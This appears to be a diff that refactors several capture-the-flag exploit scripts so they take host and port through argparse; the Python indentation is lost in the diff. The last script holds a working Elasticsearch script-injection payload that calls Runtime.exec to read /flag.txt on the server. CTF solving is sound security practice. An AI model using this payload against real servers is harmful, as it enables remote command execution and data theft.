#!/usr/bin/env python2.7
+from argparse import ArgumentParser
import sys
import telnetlib
import rng
from rng import RNG
-host = "localhost"
-port = 1337
+
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
ARGS = (2**31, 7**6, 5)
if __name__ == "__main__":
- main(host, port)
+ main(HOST, PORT)
#!/usr/bin/env python3
+from argparse import ArgumentParser
import base64
import sys
import telnetlib
-if len(sys.argv) != 3:
- print('Usage: {} host port'.format(sys.argv[0]))
- sys.exit(1)
-HOST = sys.argv[1]
-PORT = int(sys.argv[2])
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
def xor(xs, ys):
#!/usr/bin/env python2.7
from Crypto.Cipher import AES
+from argparse import ArgumentParser
import base64
import struct
import sys
import telnetlib
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
+
ciphertext = 'nXThFPCdp6OfGwaBwuF0+w=='
cipherbytes = base64.b64decode(ciphertext)
def main():
- attack(sys.argv[1], int(sys.argv[2]))
+ attack(HOST, PORT)
if __name__ == "__main__":
main()
#!/usr/bin/env python3
+from argparse import ArgumentParser
import sys
import re
import requests
+
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
+
+
def attack(base_url):
base_url = base_url.rstrip('/')
resp = requests.get(base_url + '/')
def main():
- attack(sys.argv[1])
+ attack(''.join(['http://', HOST, ':', str(PORT)]))
if __name__ == '__main__':
#!/bin/sh
test -z "$1" && exit 1
+test -z "$2" && exit 1
+test -z "$3" && exit 1
+test -z "$4" && exit 1
+HOST="$2"
+PORT="$4"
SPLOIT='onion"}},"script_fields":{"pwn":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat%20/flag.txt\").getText()'
-curl -sSg "$1/search/?q=$SPLOIT" | grep "hackover16"
+curl -sSg "http://$HOST:$PORT/search/?q=$SPLOIT" | grep "hackover16"